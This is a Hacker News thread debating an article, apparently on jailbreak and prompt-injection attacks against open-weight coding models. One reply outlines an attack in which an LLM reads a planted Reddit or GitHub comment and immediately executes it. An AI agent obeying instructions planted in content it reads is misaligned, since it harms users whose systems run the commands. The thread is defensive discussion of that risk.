←back to thread

146 points jakozaur | 6 comments | | HN request time: 0.283s | source | bottom
1. splittydev ◴[] No.45670263[source]
All of these are incredibly obvious. If you have even the slightest idea of what you're doing and review the code before deploying it to prod, this will never succeed.

If you have absolutely no idea what you're doing, well, then it doesn't really matter in the end, does it? You're never gonna recognize any security vulnerabilities (as has happened many times with LLM-assisted "no-code" platforms and without any actual malicious intent), and you're going to deploy unsafe code either way.

replies(2): >>45670324 #>>45671085 #
2. tcdent ◴[] No.45670324[source]
Sure, you can simplify these observations into just codegen. But the real observation is not that these models are more susceptible to fail when generating code, but that they are more susceptible to jailbreak-type attacks that most people have come to expect to be handled by post training.

Having access to open models is great, and even if their capabilities are somewhat lower than the closed-source SoTA models, and we should be aware of the differences in behavior.

replies(2): >>45673892 #>>45673954 #
3. BoiledCabbage ◴[] No.45671085[source]
> All of these are incredibly obvious. If you have even the slightest idea of what you're doing and review the code before deploying it to prod, this will never succeed.

Well this is wrong. And it's exactly this type of thinking why people will get absolutely burned by this.

First off the fact they chose obvious exploits for explanatory purposes doesn't mean this attack only supports obvious exploits...

And to your second point of "review the code before you deploy to prod", the second attack did not involve deploying any code to prod. It involved an LLM reading a reddit comment or github comment and immediately executing.

People not taking security seriously and waving it off as trivial is what's gonna make this such a terrible problem.

replies(1): >>45673906 #
4. thayne ◴[] No.45673892[source]
> more susceptible to jailbreak-type attacks that most people have come to expect to be handled by post training

the keyword here is "more". The big models might not be quite as susceptible to them, but they are still susceptible. If you expect these attacks to be fully handled, then maybe you should change your expectations.

5. thayne ◴[] No.45673906[source]
> It involved an LLM reading a reddit comment or github comment and immediately executing.

right, so you shouldn't give the LLM access to execute arbitrary commands without review.

6. ◴[] No.45673954[source]